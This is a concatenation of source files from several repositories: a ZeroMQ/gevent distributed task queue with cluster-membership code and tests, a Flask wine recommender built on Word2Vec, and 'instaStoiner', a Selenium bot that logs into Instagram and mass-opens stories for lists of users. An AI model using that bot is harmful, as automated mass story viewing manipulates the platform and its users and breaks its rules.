frontend = Device(zmq.QUEUE, zmq.XREP, zmq.XREQ, ctx)
frontend.bind_in('tcp://%s:7000' % interface)
frontend.bind_out('inproc://frontend-out')
print "Starting frontend on 7000..."
frontend.start()
enqueue_out = ctx.socket(zmq.PUSH)
# token::{task}
# :time:{task}
# token:time:{task}
# ::{task}
# {task}
def enqueuer():
incoming = ctx.socket(zmq.REP)
incoming.connect('inproc://frontend-out')
while True:
msg = incoming.recv()
params, task = msg.split('{', 1)
task = '{%s' % task
if params:
token, time, x = params.split(':')
else:
token = None
time = None
id = enqueue(task, time, token)
if id:
incoming.send('{"status":"stored", "id": "%s"}' % id)
elif id == False:
incoming.send('{"status":"duplicate"}')
else:
incoming.send('{"status":"failure"}')
def enqueue(task, time=None, token=None):
if token and token in enqueued:
return False
id = uuid.uuid4().hex
if agenda.add(id, at=time or None) and datastore.set(id, task):
if token:
enqueued.add(token)
enqueue_out.send_pyobj((id, task))
return id
else:
return None
def dispatcher():
incoming = ctx.socket(zmq.PULL)
incoming.bind('tcp://%s:7050' % interface)
incoming.bind('inproc://dispatcher-in')
outgoing = ctx.socket(zmq.PUSH)
print "Binding dispatcher on 8000..."
outgoing.bind('tcp://%s:8000' % interface)
while True:
id, task = incoming.recv_pyobj()
if not datastore.get('%s-dispatch' % id):
outgoing.send("%s:%s" % (id, task))
datastore.set('%s-dispatch' % id, dispatch_timeout)
def finisher():
incoming = ctx.socket(zmq.SUB)
incoming.setsockopt(zmq.SUBSCRIBE, "")
print "Binding finisher on 9000..."
incoming.bind('tcp://%s:9000' % interface)
while True:
id = incoming.recv()
datastore.delete('%s-dispatch' % id)
datastore.delete(id)
def control():
while True:
cmd, payload = cluster.control.recv().split(',')
# ...
def web_enqueuer(env, start_response):
req = webob.Request(env)
task = dict(req.POST)
if '_time' in task:
del task['_time']
if '_token' in task:
del task['_token']
task = json.dumps(task)
id = enqueue(task, req.POST.get('_time'), req.POST.get('_token'))
if id:
start_response('200 OK', [('Content-Type', 'application/json')])
return ['{"status":"stored", "id": "%s"}\n' % id]
outgoing.send_pyobj((id, task))
elif id == False:
start_response('400 Bad request', [('Content-Type', 'application/json')])
return ['{"status":"duplicate"}\n']
else:
start_response('500 Server error', [('Content-Type', 'application/json')])
return ['{"status":"failure"}\n']
def setup_enqueue():
def connect(node):
print "Enqueuer connecting to %s..." % node
if node == interface:
enqueue_out.connect('inproc://dispatcher-in')
else:
enqueue_out.connect('tcp://%s:7050' % node)
for node in cluster.all():
connect(node)
cluster.callbacks['add'].append(lambda x: map(connect,x))
try:
for n in range(2):
eventlet.spawn_after(1, enqueuer)
eventlet.spawn_n(dispatcher)
eventlet.spawn_n(finisher)
eventlet.spawn_after(1, setup_enqueue)
wsgi.server(eventlet.listen((interface, 8080)), web_enqueuer)
#while True:
# eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
print "Exiting..."
cluster.leave()
ctx.term() |
progrium/miyamoto | miyamoto/tests/test_cluster.py | <filename>miyamoto/tests/test_cluster.py
import multiprocessing
import gevent
from nose import with_setup
from miyamoto.test import Cluster
from miyamoto.test import TaskCountdown
from miyamoto import constants
_cluster = Cluster(size=2, replica_factor=2)
def start_cluster():
_cluster.start()
def stop_cluster():
_cluster.stop()
@with_setup(start_cluster, stop_cluster)
def test_cluster_starts_and_all_nodes_work():
countdown = TaskCountdown(len(_cluster))
url = countdown.start()
for node in _cluster.nodes:
node.enqueue('test', {'url': url})
countdown.wait(1)
assert countdown.finished()
@with_setup(start_cluster, stop_cluster)
def test_replication_by_killing_node_after_schedule():
countdown = TaskCountdown(1)
url = countdown.start()
assert _cluster.nodes[0].enqueue('test', {'url': url, 'countdown': 1})
assert not countdown.finished()
_cluster.nodes[0].terminate()
countdown.wait(1)
assert countdown.finished()
@with_setup(start_cluster, stop_cluster)
def test_add_node_and_that_it_replicates_into_cluster():
countdown = TaskCountdown(2)
url = countdown.start()
node = _cluster.add()
gevent.sleep(2)
print url
assert node.enqueue('test', {'url': url})
assert node.enqueue('test', {'url': url})
#node.enqueue('test', {'url': url, 'countdown': 2})
#node.terminate()
countdown.wait(2)
print countdown.count
assert countdown.finished()
def test_killing_the_leader_means_nothing():
# start cluster
# kill leader
# add node
# hit nodes twice
# assert tasks
pass
|
progrium/miyamoto | miyamoto/cluster.py | """A distributed group membership module
This provides distributed group membership for easily building clustered
applications with gevent. Using this in your app, you just provide the IP
of another node in the cluster and it will receive the IPs of all nodes in
the cluster. When a node joins or drops from the cluster, all other nodes find
out immediately.
The roster is managed by a leader. When you create a cluster, you tell the
first node it is the leader (by simply pointing it to its own IP). As you
add nodes, you can point them to the leader or any other node. If a node
is not the leader, it will redirect the connection to the leader. All nodes
also maintain a keepalive with the leader.
If the leader drops from the cluster, the nodes will dumbly pick a new leader
by taking the remaining node list, sorting it, and picking the first node. If
a node happens to get a different leader, as long as it is in the cluster, it
will be redirected to the right leader.
To try it out on one machine, you need to make several more loopback interfaces:
In OSX:
ifconfig lo0 inet 127.0.0.2 add
ifconfig lo0 inet 127.0.0.3 add
ifconfig lo0 inet 127.0.0.4 add
In Linux:
ifconfig lo:2 127.0.0.2 up
ifconfig lo:3 127.0.0.3 up
ifconfig lo:4 127.0.0.4 up
Now you can start the first node on 127.0.0.1:
INTERFACE=127.0.0.1 python cluster.py
The first argument is the leader, the second is the interface to bind to.
Start the others pointing to 127.0.0.1:
INTERFACE=127.0.0.2 LEADER=127.0.0.1 python cluster.py
INTERFACE=127.0.0.3 LEADER=127.0.0.1 python cluster.py
Try starting the last one pointing to a non-leader:
INTERFACE=127.0.0.4 LEADER=127.0.0.3 python cluster.py
Now you can kill any node (including the leader) and bring up another node
pointing to any other node, and they all get updated immediately.
"""
import gevent.monkey; gevent.monkey.patch_all()
import logging
import socket
import json
import gevent
import gevent.server
import gevent.socket
import constants
import util
logger = logging.getLogger('cluster')
class ClusterError(Exception): pass
class NewLeader(Exception): pass
class ClusterManager(object):
def __init__(self, leader, callback=None, interface=None, port=constants.DEFAULT_CLUSTER_PORT):
""" Callback argument is called when the cluster updates. """
if interface is None:
interface = socket.gethostbyname(socket.gethostname())
self.interface = interface
self.leader = leader
self.callback = callback
self.port = port
self.cluster = set()
self.pool = []
self.server = gevent.server.StreamServer((self.interface, self.port), self._connection_handler)
self.connections = {}
def is_leader(self):
return self.interface == self.leader
def start(self):
logger.info("Cluster manager starting for %s on port %s" % (self.interface, self.port))
self.server.start()
if self.is_leader():
self.cluster.add(self.interface)
if self.callback:
self.callback(self.cluster.copy())
else:
gevent.spawn(self.connect)
def connect(self):
"""
Connects to the currently known leader. It maintains a connection expecting
JSON lists of hosts in the cluster. It should receive a list on connection,
however, if a list of one, this is a redirect to the leader (you hit a node
in the cluster that's not the leader). We also maintain a keepalive. If we
disconnect, it does a leader elect and reconnects.
"""
while True:
logger.info("Connecting to leader %s on port %s" % (self.leader, self.port))
try:
client = util.connect_and_retry((self.leader, self.port),
source_address=(self.interface, 0), max_retries=5)
except IOError:
raise ClusterError("Unable to connect to leader: %s" % self.leader)
logger.info("Connected to leader")
# Use TCP keepalives
keepalive = gevent.spawn_later(5, lambda: client.send('\n'))
try:
for line in util.line_protocol(client, strip=False):
if line == '\n':
# Keepalive ack from leader
keepalive.kill()
keepalive = gevent.spawn_later(5, lambda: client.send('\n'))
else:
new_cluster = json.loads(line)
if len(new_cluster) == 1:
# Cluster of one means you have the wrong leader
self.leader = new_cluster[0]
logger.info("Redirected to %s..." % self.leader)
raise NewLeader()
else:
self.cluster = set(new_cluster)
if self.callback:
self.callback(self.cluster.copy())
self.cluster.remove(self.leader)
candidates = list(self.cluster)
candidates.sort()
self.leader = candidates[0]
logger.info("New leader %s..." % self.leader)
# TODO: if i end up thinking i'm the leader when i'm not
# then i will not rejoin the cluster
raise NewLeader()
except NewLeader:
if self.callback:
self.callback(self.cluster.copy())
if not self.is_leader():
gevent.sleep(1) # TODO: back off loop, not a sleep
else:
break
def _connection_handler(self, socket, address):
"""
If not a leader, a node will simply return a single item list pointing
to the leader. Otherwise, it will add the host of the connected client
to the cluster roster, broadcast to all nodes the new roster, and wait
for keepalives. If no keepalive within timeout or the client drops, it
drops it from the roster and broadcasts to all remaining nodes.
"""
#print 'New connection from %s:%s' % address
if not self.is_leader():
socket.send(json.dumps([self.leader]))
socket.close()
else:
self._update(add={'host': address[0], 'socket': socket})
timeout = gevent.spawn_later(10, lambda: self._shutdown(socket))
for line in util.line_protocol(socket, strip=False):
timeout.kill()
timeout = gevent.spawn_later(10, lambda: self._shutdown(socket))
socket.send('\n')
#print "keepalive from %s:%s" % address
#print "client disconnected"
self._update(remove=address[0])
def _shutdown(self, socket):
try:
socket.shutdown(0)
except IOError:
pass
def _update(self, add=None, remove=None):
""" Used by leader to manage and broadcast roster """
if add is not None:
self.cluster.add(add['host'])
self.connections[add['host']] = add['socket']
if remove is not None:
self.cluster.remove(remove)
del self.connections[remove]
for conn in self.connections:
self.connections[conn].send('%s\n' % json.dumps(list(self.cluster)))
if self.callback:
self.callback(self.cluster.copy())
if __name__ == '__main__':
import os
interface = os.environ.get('INTERFACE')
leader = os.environ.get('LEADER', interface)
def print_cluster(cluster):
print json.dumps(list(cluster))
print "%s: Using leader %s..." % (interface, leader)
ClusterManager(leader, callback=print_cluster, interface=interface).start()
while True:
gevent.sleep() |
progrium/miyamoto | attic/zmq_prototype/cluster.py | <filename>attic/zmq_prototype/cluster.py
import sys
import os
import random
import eventlet
import collections
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from zmq import devices
import memcache
use_hub('zeromq')
class CoordinationError(Exception): pass
class ClusterNode(object):
""" This is a simple cluster management system using memcache to coordinate.
It uses heartbeats to keep the local cluster representation fresh while
refreshing the node's record in memcache for the others. If a node
doesn't heartbeat before its TTL, it will be dropped from peers when
they heartbeat. """
retries = 3
def __init__(self, context, client, prefix, id, ttl=30, port=7777):
self.context = context
self.client = client
self.index = prefix
self.id = id
self.ttl = ttl
self.port = port
self.cluster = set()
self.control = None
self.callbacks = collections.defaultdict(list)
def join(self):
for retry in range(self.retries):
cluster = self.client.gets(self.index) or ''
if cluster:
cluster = self._cleanup_index(set(cluster.split(',')))
else:
cluster = set()
self.client.set('%s.%s' % (self.index, self.id), self.id, time=self.ttl)
cluster.add(self.id)
if self.client.cas(self.index, ','.join(cluster)):
print "[Cluster] Joined as %s" % self.id
self.cluster = cluster
self._schedule_heartbeat()
self._create_sockets(self.cluster)
return True
raise CoordinationError()
def leave(self):
for retry in range(self.retries):
self.client.delete('%s.%s' % (self.index, self.id))
cluster = self.client.gets(self.index) or ''
if cluster:
cluster = self._cleanup_index(set(cluster.split(',')))
else:
cluster = set()
if self.client.cas(self.index, ','.join(cluster)):
self.cluster = set()
return True
raise CoordinationError()
def peers(self):
return list(self.cluster - set([self.id]))
def all(self):
return list(self.cluster)
def _cleanup_index(self, cluster):
index = self.client.get_multi(cluster, '%s.' % self.index)
return set([n for n in index if n])
def _create_sockets(self, addresses=None):
self.control = self.context.socket(zmq.SUB)
self.control.setsockopt(zmq.SUBSCRIBE, '')
self._control_out = self.context.socket(zmq.PUB)
self._control_out.bind('tcp://%s:%s' % (self.id, self.port))
if addresses:
self._connect_sockets(addresses)
def _connect_sockets(self, addresses):
for address in addresses:
self.control.connect('tcp://%s:%s' % (address, self.port))
def send(self, message):
self._control_out.send(message)
def _schedule_heartbeat(self):
if len(self.cluster):
random_interval = random.randint(self.ttl/2, self.ttl-(self.ttl/5))
def update():
self.client.set('%s.%s' % (self.index, self.id), self.id, time=self.ttl)
old_cluster = self.cluster
self.cluster = self._cleanup_index(set(self.client.get(self.index).split(',')))
print self.cluster
added = self.cluster - old_cluster
if added:
print "[Cluster] Added %s" % ', '.join(added)
self._connect_sockets(added)
for cb in self.callbacks['add']:
cb(added)
self._schedule_heartbeat()
eventlet.spawn_after(random_interval, update)
|
progrium/miyamoto | miyamoto/queue.py | <filename>miyamoto/queue.py
import gevent.monkey; gevent.monkey.patch_all()
import socket
import urllib2
try:
import json
except ImportError:
import simplejson as json
import gevent
import gevent.pywsgi
import gevent.queue
from cluster import ClusterManager
from scheduler import DistributedScheduler
from task import Task
import constants
class QueueServer(object):
# TODO: make args list
def __init__(self, leader, replica_factor=constants.DEFAULT_REPLICA_FACTOR,
replica_offset=constants.DEFAULT_REPLICA_SECS_OFFSET, interface=None,
frontend_port=constants.DEFAULT_FRONTEND_PORT,
backend_port=constants.DEFAULT_BACKEND_PORT,
cluster_port=constants.DEFAULT_CLUSTER_PORT):
if interface is None:
interface = socket.gethostbyname(socket.gethostname())
self.queue = gevent.queue.Queue()
self.frontend = gevent.pywsgi.WSGIServer((interface, frontend_port), self._frontend_app, log=None)
self.scheduler = DistributedScheduler(self.queue, leader, replica_factor=replica_factor,
replica_offset=replica_offset, interface=interface, port=backend_port, cluster_port=cluster_port)
self._ready_event = None
def start(self, block=True):
self.frontend.start()
self.scheduler.start()
while not self.frontend.started:
gevent.sleep(1)
self._ready_event.set()
while block:
gevent.sleep(1)
def _frontend_app(self, env, start_response):
try:
queue_name = env['PATH_INFO']
content_type = env['CONTENT_TYPE']
body = env['wsgi.input'].read()
task = Task(queue_name, content_type, body)
self.scheduler.schedule(task) # TODO: needs queue on the other end
start_response('200 OK', [('Content-Type', 'application/json')])
return ['{"status": "scheduled", "id": "%s"}\n' % task.id]
except NotImplemented, e:
start_response('500 Error', [('Content-Type', 'application/json')])
return [json.dumps({"status": "error", "reason": repr(e)})]
|
progrium/miyamoto | miyamoto/util.py | import random
import gevent.socket
def line_protocol(socket, strip=True):
fileobj = socket.makefile()
while True:
try:
line = fileobj.readline() # returns None on EOF
if line is not None and strip:
line = line.strip()
except IOError:
line = None
if line:
yield line
else:
break
def connect_and_retry(address, source_address=None, max_retries=None):
max_delay = 3600
factor = 2.7182818284590451 # (math.e)
jitter = 0.11962656472 # molar Planck constant times c, joule meter/mole
delay = 1.0
retries = 0
while True:
try:
return gevent.socket.create_connection(address, source_address=source_address)
except IOError:
retries += 1
if max_retries is not None and (retries > max_retries):
raise IOError("Unable to connect after %s retries" % max_retries)
delay = min(delay * factor, max_delay)
delay = random.normalvariate(delay, delay * jitter)
gevent.sleep(delay)
|
progrium/miyamoto | scripts/sampler.py | import collections
import operator
import time
import os
import gevent.pywsgi
from gevent_zeromq import zmq
class RateSampler(object):
"""Tool for pushing rate over time data"""
def __init__(self, frequency=1, resolution=1, parent=None, callback=None, name=None):
""" frequency: Rate update frequency in seconds
resolution: Interval to average data over in seconds
parent: Another RateSampler that ticks will propagate to
callback: Optional callback when frequency is updated"""
self.frequency = frequency
self.resolution = resolution
self.parent = parent
self.callback = callback
self.samples = collections.defaultdict(int)
self.ticks = 0
self.last_start = None
self.last_value = 0
if not name and parent:
self.name = parent.name
else:
self.name = name
def _update(self):
if self.last_start and int(time.time() - self.last_start) > self.frequency:
# Add empty samples
for x in range(self.frequency-len(self.samples)):
self.samples[x] = 0
self.last_value = reduce(operator.add, self.samples.values()) / self.resolution / self.frequency
self.last_start = int(time.time())
if self.callback:
# reactor.callLater(0, self.callback, self.last_value, self.ticks)
self.callback(self.last_value, self.ticks)
self.ticks = 0
self.samples = collections.defaultdict(int)
def tick(self, ticks=1):
if not self.last_start:
self.last_start = int(time.time())
self._update()
if self.parent:
self.parent.tick(ticks)
self.samples[int(time.time() / self.resolution)] += ticks
self.ticks += ticks
return self
def getvalue(self):
self._update()
return self.last_value
def __int__(self):
return self.getvalue()
def __str__(self):
# Okay, hardcoding 1 sec resolutions for now
return "%i %s/sec" % (self.getvalue(), self.name or 'ticks')
def __repr__(self):
return "<SampledRate: %i avg/%is updated/%is>" % (self.getvalue(), self.frequency, self.resolution)
def redraw(v, t):
os.system("clear")
print "Last sample: %s tasks/sec" % v
rate = RateSampler(1, 5, callback=redraw, name='tasks')
ctx = zmq.Context()
def http_sampler(env, start_response):
rate.tick()
start_response('200 OK', [])
return ['ok']
def zmq_sampler():
socket = ctx.socket(zmq.REP)
socket.bind('tcp://127.0.0.1:9999')
while True:
socket.recv()
rate.tick()
socket.send("ok")
gevent.spawn(zmq_sampler)
server = gevent.pywsgi.WSGIServer(('', int(os.environ.get('PORT', 9099))), http_sampler, log=None)
server.serve_forever()
|
progrium/miyamoto | miyamoto/dispatcher.py | import gevent.monkey; gevent.monkey.patch_all()
import socket
import urllib2
try:
import json
except ImportError:
import simplejson as json
from gevent_zeromq import zmq
import gevent
import gevent.monkey
import gevent.server
import gevent.socket
import gevent.queue
import gevent.event
import gevent.coros
import httplib2
from task import Task
import util
import constants
class TaskFailure(Exception): pass
class DispatchClient(object):
def __init__(self, interface, callback):
self.interface = interface
self.callback = callback
self.socket = None
def start(self):
gevent.spawn(self._run)
def dispatch(self, task):
if self.socket:
self.socket.send('%s\n' % task.serialize())
def _run(self):
while True:
try:
self.socket = gevent.socket.create_connection((self.interface, 6002), source_address=(self.interface, 0))
for line in util.line_protocol(self.socket):
event, payload = line.split(':', 1)
self.callback(event, payload)
except IOError:
pass
print "disconnected from dispatcher, retrying..."
class Dispatcher(object):
def __init__(self, interface, zmq_context, workers=10):
# hardcoding for now
self.workers = workers
self.server = gevent.server.StreamServer((interface, 6002), self._connection_handler)
self.queue = gevent.queue.Queue()
self.scheduler = None
self.zmq = zmq_context
self.zmq_sockets = {}
def start(self, block=True):
self.server.start()
for n in xrange(self.workers):
gevent.spawn(self._dispatcher)
while block:
gevent.sleep(1)
def _dispatcher(self):
http = httplib2.Http()
while True:
try:
task = Task.unserialize(self.queue.get())
timeout = gevent.Timeout(constants.WORKER_TIMEOUT)
timeout.start()
self.scheduler.send('start:%s\n' % task.id)
if task.url.startswith('http'):
headers = {"User-Agent": "Miyamoto/0.1", "X-Task": task.id, "X-Queue": task.queue_name}
resp, content = http.request(task.url, method=task.method, headers=headers)
else:
zmq_remotes = frozenset(task.url.split(','))
if not zmq_remotes in self.zmq_sockets:
sock = self.zmq.socket(zmq.REQ)
lock = gevent.coros.Semaphore()
for remote in zmq_remotes:
sock.connect(remote)
self.zmq_sockets[zmq_remotes] = (sock, lock)
else:
sock, lock = self.zmq_sockets[zmq_remotes]
try:
lock.acquire() # Because send/recv have to be done together
sock.send(task.url)
resp = sock.recv()
except zmq.ZMQError:
raise
finally:
lock.release()
self.scheduler.send('success:%s\n' % task.id)
except (gevent.Timeout, zmq.ZMQError, TaskFailure), e:
self.scheduler.send('failure:%s:%s\n' % (task.id, str(e)))
finally:
timeout.cancel()
def _connection_handler(self, socket, address):
print "pair connected"
self.scheduler = socket
for line in util.line_protocol(socket):
self.queue.put(line)
print "pair dropped"
|
progrium/miyamoto | miyamoto/tests/test_service.py | <gh_stars>1-10
import gevent
from miyamoto import service
class BasicService(service.Service):
def __init__(self, name):
super(BasicService, self).__init__()
self.name = name
def _start(self):
return service.READY
def _stop(self):
pass
class SlowReadyService(BasicService):
def _start(self):
self.spawn(self._run)
def _run(self):
gevent.sleep(0.5)
self._ready_event.set()
def test_basic_service():
s = BasicService('test')
s.start()
assert s.started == True, "Service is not started"
assert s.ready == True, "Service is not ready"
s.stop()
assert s.started == False, "Service did not stop"
def test_slow_ready_service():
s = SlowReadyService('test')
s.start(block_until_ready=False)
assert s.ready == False, "Service was ready too quickly"
assert s.started == True, "Service is not started"
s.stop()
assert s.ready == False, "Service was still ready after stop"
assert s.started == False, "Service did not stop"
s.start()
assert s.ready == True, "Service was not ready after blocking start"
s.stop()
assert s.ready == False, "Service was still ready after stop"
def test_child_service():
class ParentService(BasicService):
def __init__(self, name):
super(ParentService, self).__init__(name)
self.child = SlowReadyService('child')
self._children.append(self.child)
def _start(self):
return service.READY
s = ParentService('parent')
s.start()
assert s.child.ready == True, "Child service is not ready"
assert s.ready == True, "Parent service is not ready"
s.stop()
assert s.child.started == False, "Child service is still started"
assert s.child.ready == False, "Child service is still ready"
def test_service_greenlets():
class GreenletService(BasicService):
def _start(self):
for n in xrange(3):
self.spawn(self._run, n)
return service.READY
def _run(self, index):
while True:
gevent.sleep(0.1)
s = GreenletService('greenlets')
s.start()
for greenlet in s._greenlets:
assert not greenlet.ready(), "Greenlet is ready when it shouldn't be"
s.stop()
for greenlet in s._greenlets:
assert greenlet.ready(), "Greenlet isn't ready after stop"
|
progrium/miyamoto | attic/zmq_prototype/agenda.py | <reponame>progrium/miyamoto<filename>attic/zmq_prototype/agenda.py<gh_stars>1-10
import time
class AgendaStoreError(Exception): pass
class Agenda(object):
""" An agenda is like an append-only list structure that's partitioned by
"time buckets" (think unrolled linked list). The time-based indexes
make it easy to query timespans, namely items since and items until,
which lets it be used for scheduling items in the future. """
retries = 3
def __init__(self, client, prefix, resolution=10, ttl=0):
self.client = client
self.prefix = prefix
self.resolution = resolution
self.ttl = ttl
def add(self, item, at=None):
bucket = self._bucket(at or time.time())
for retry in range(self.retries):
if self.client.append(bucket, ',%s' % str(item), self.ttl) or \
self.client.add(bucket, str(item), self.ttl):
return True
raise AgendaStoreError()
def get(self, since=None, until=None):
since = self._time(since or time.time())
until = self._time(until or time.time())
num_buckets = (until - since) / self.resolution
keys = [self._bucket(since + (i * self.resolution)) for i in range(num_buckets)]
buckets = self.client.get_multi(keys)
if buckets:
return ','.join(buckets).split(',')
def _time(self, time):
return int(time) - int(time) % self.resolution
def _bucket(self, time):
return '%s-%s' % (self.prefix, self._time(time))
# in progress flag, remember in node <- cleanup, check if still around
# emitter catches internal jobs
|
kvnhu/oeno | oeno.py | import difflib
import numpy as np
import os
import pandas as pd
import re
import string
from flask import Flask
from flask import render_template
from flask import request
from gensim.models import Word2Vec
from sklearn.decomposition import PCA
app = Flask(__name__)
DESCRIPTION = 'description'
TITLE = 'title'
EMBEDDING = 'embedding'
WINE_DATA_FILE_PATH = "./data/winemag-data-130k-v2.csv"
original_wine = None
wine_term = None
wines = None
model = None
@app.route("/")
def index():
""" Index page for the web app. """
return render_template('index.ejs')
@app.route("/search-wine", methods=['POST'])
def recommend_wine():
""" Saves the wine already liked by the user. """
global original_wine
global wines
global model
print('fitting model and obtaining original enjoyed wine...')
fit_model_and_compute_description_embeddings()
original_wine = str(request.form['wine'])
def match_wine_title():
title_match_scores = wines[TITLE].apply(lambda x: difflib.SequenceMatcher(None, original_wine.lower(), x.lower()).ratio())
return title_match_scores.argmax()
print('matching wines...')
matched_idx = match_wine_title()
description_match_scores = wines[EMBEDDING].apply(
lambda x: np.dot(
np.array(x),
np.array(wines[EMBEDDING].iloc[matched_idx])
)
)
print('generating output...')
html = ""
for wine in wines[TITLE][description_match_scores.nlargest(11).index]:
html += wine + '<br>'
return html
@app.route("/search-term", methods=['POST'])
def get_wine_term():
""" Finds similar terms. """
global wine_term
global model
print('fitting model and obtaining wine term...')
fit_model_and_compute_description_embeddings(model_only=True)
wine_term = request.form['term'].lower()
print ('generating output...')
html = u"Closest terms to %s:<br>" % wine_term
for term, score in model.wv.most_similar(wine_term, topn=1000):
try:
html += '> ' + term.decode('utf-8') + '<br>'
except:
print (term)
return html
@app.route("/wine-math", methods=['POST'])
def wine_math():
""" Computes wine flavor arithmetic. """
global wine_term
global model
print('fitting model and obtaining wine terms...')
fit_model_and_compute_description_embeddings(model_only=True)
add_terms = request.form['adds'].lower()
subtract_terms = request.form['subtracts'].lower()
add_term_list = ','.join(add_terms.split(', ')).split(',')
sub_term_list = ','.join(subtract_terms.split(', ')).split(',')
print ('generating output...')
html = u"%s <br> - %s <br> = <br>" % (' + '.join(add_term_list), ' - '.join(sub_term_list))
strong_html = "Strong matches:<br>"
weak_html = "Weak matches:<br>"
for term, score in model.wv.most_similar(positive=add_term_list, negative=sub_term_list, topn=100):
no_match = True
for candidate in (add_term_list + sub_term_list):
if difflib.SequenceMatcher(None, term.decode('utf-8'), candidate.decode('utf-8')).ratio() > 0.5:
print term
no_match = False
if no_match:
if score > 0.5:
strong_html += '> ' + term.decode('utf-8') + '<br>'
elif score > 0.3:
weak_html += '> ' + term.decode('utf-8') + '<br>'
return html + '<br>' + strong_html + '<br>' + weak_html
def prepare_dataset(fp):
""" Cleans up the dataset for analysis. """
wines = pd.read_csv(fp).drop_duplicates(subset=DESCRIPTION)
wines.index = range(len(wines))
return wines
def tokenize_descriptions(descriptions):
""" Tokenizes review descriptions to be digested by Word2Vec. """
return [
[
word.lower().translate(None, string.punctuation)
for word in re.split(' |-', sentence)
]
for sentence in descriptions
]
def train_language_model(sentences, min_count=10, size=500, window=10, sample=1e-3):
""" Uses Word2Vec to train a word embedding, given the reviews as a corpus.
Parameters
----
sentences : list of lists of strings
min_count : minimum frequency of a term to be trained on/fitted
size : dimensionality of the Word2Vec vector space
window : context window when training (narrower focuses on word meaning; wider focuses on topical meaning)
sample : sampling rate for high frequency words
"""
model = Word2Vec(sentences, min_count=min_count, size=size, window=window, sample=sample)
return model
def fit_model_and_compute_description_embeddings(fp='wine.model', model_only=False):
""" Fits the model, and then uses the model to compute the normalized sum of word vectors for each description."""
global wines
global model
if not model:
if model_only and os.path.exists(fp):
model = Word2Vec.load(fp)
else:
wines = prepare_dataset(WINE_DATA_FILE_PATH)
sentences = tokenize_descriptions(list(wines[DESCRIPTION].values))
if os.path.exists(fp):
model = Word2Vec.load(fp)
else:
model = train_language_model(sentences)
model.save(fp)
if not model_only:
normed = []
for sentence in sentences:
summed = np.sum([model.wv[word] for word in np.unique(sentence)
if (word in model.wv)
# and (vocab[word] < 10000)
], axis=0)
normed.append(summed / np.sum(summed ** 2.0) ** 0.5)
wines[EMBEDDING] = normed
if __name__ == '__main__':
app.run()
|
ractyfree/instaStoiner | classes/Instagram.py |
import os
import random
import time
import logging
import sys
from classes.InstagramLinkEndpoints import *
class Instagram:
def __init__(self, login, password, browser):
self.login = login
self.password = password
self.browser = browser
def doLogin(self):
self.browser.openPageWaitForElem(InstagramLinkEndpoints.loginPage, "//input[@name='username']")
inputLogin = self.browser.sendTextForm(self.login, "//input[@name='username']")
inputPassword = self.browser.sendTextForm(self.password, "//input[@name='password']")
showPassword = self.browser.locateElemXpath("//div/button[@class='sqdOP yWX7d _8A5w5 ']")
showPassword.click()
logging.info("YOU NOW NEED TO CLICK ON 'LOGIN' BUTTON FOR YOURSELF AND THEN SKIP NOTIFICATION! YOU HAVE 15 SECONDS!")
time.sleep(15)
def viewStory(self, username):
try:
self.browser.openPageWaitForElem(InstagramLinkEndpoints.buildStoriesPage(username), "//div[@class='_7UhW9 xLCgt MMzan h_zdq uL8Hv ']")
self.browser.locateElemXpath("//div[@class='_7UhW9 xLCgt MMzan h_zdq uL8Hv ']").click()
except:
return "Seems like user doesn't have a story!"
#time.sleep(2)
|
ractyfree/instaStoiner | classes/ChromeDriver.py | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
import pickle
import os
import random
import time
class ChromeDriverClass:
CHROMEDRIVERRPATH = "bin/chromedriver.exe"
COOKIESFILE = "cookies.pkl"
DEFAULTTIMEOUT = 3
def __init__(self, cookies = False, tabs=3):
self.driver = self.getBrowser()
self.tabs = tabs
if self.__isThereCookies() and cookies == True:
self.__loadCookies
def getBrowser(self):
return webdriver.Chrome(executable_path=self.CHROMEDRIVERRPATH)
def makeNewTabs(self):
for _ in range(0, self.tabs):
self.driver.execute_script("window.open('');")
def switchTab(self, tab):
return self.driver.switch_to_window(tab)
def getAllTabs(self):
return self.driver.window_handles
def openPage(self, page):
return self.driver.get(page)
def locateElemXpath(self, xpath):
return self.driver.find_element_by_xpath(xpath)
def openPageWaitForElem(self, page, xpath):
self.openPage(page)
WebDriverWait(self.driver, self.DEFAULTTIMEOUT).until(EC.presence_of_element_located((By.XPATH, xpath)))
def saveCookies(self):
pickle.dump(self.driver.get_cookies(), open(self.COOKIESFILE, "wb"))
def __loadCookies(self):
cookies = pickle.load(open(self.COOKIESFILE, "rb"))
for x in cookies:
self.driver.add_cookie(cookie)
def __isThereCookies(self):
return os.path.exists(self.COOKIESFILE)
def sendTextForm(self, text, xpath):
inputForm = self.locateElemXpath(xpath)
for x in text:
inputForm.send_keys(x)
time.sleep(0.05) |
ractyfree/instaStoiner | instaStoiner.py | <gh_stars>1-10
from classes.ChromeDriver import *
from classes.Instagram import *
from classes.InstagramLinkEndpoints import *
class InstaStoiner:
TIMEOFSTORY = 30
def __init__(self, login, password, users_list=[], storviewcnt=100000, cookies=False, tabs=3):
self.login = login
self.password = password
self.users_list = users_list
self.storviewcnt = storviewcnt
self.cookies = cookies
self.tabs = tabs
def __makeQueue(self):
queue = []
tab = 0
for x in self.users_list:
if tab > self.tabs:
tab = 0
queue.append([x,tab])
tab+=1
return queue
def start(self):
browser = ChromeDriverClass(self.cookies, self.tabs)
insta = Instagram(self.login, self.password, browser)
insta.doLogin()
# We are logged in! Now we can iterate through all users and watch their stories multionausly
browser.makeNewTabs()
tabs = browser.getAllTabs()
for x in self.__makeQueue():
browser.switchTab(tabs[x[1]])
insta.viewStory(x[0])
'''
if x[1] == self.tabs:
time.sleep(2)
'''
time.sleep(1)
|
ractyfree/instaStoiner | classes/InstagramLinkEndpoints.py | <filename>classes/InstagramLinkEndpoints.py
class InstagramLinkEndpoints:
loginPage = "https://www.instagram.com/accounts/login"
mainPage = "https://www.instagram.com/"
def buildProfilePage(username):
return "https://www.instagram.com/" + username + "/"
def buildStoriesPage(username):
return "https://www.instagram.com/stories/" + username + "/"
|
ractyfree/instaStoiner | example_USAGE.py | from instaStoiner import*
def readFile(filename):
f = open(filename, "r")
ret = []
for x in f:
ret.append(x)
return ret
if __name__ == "__main__":
users = readFile("users_cruslah.txt")
insta = InstaStoiner("YOUR_LOGIN", "YOUR_PASSWORD", users_list=users)
insta.start()
|
mamu234/one-minute-pitch | config.py | <filename>config.py
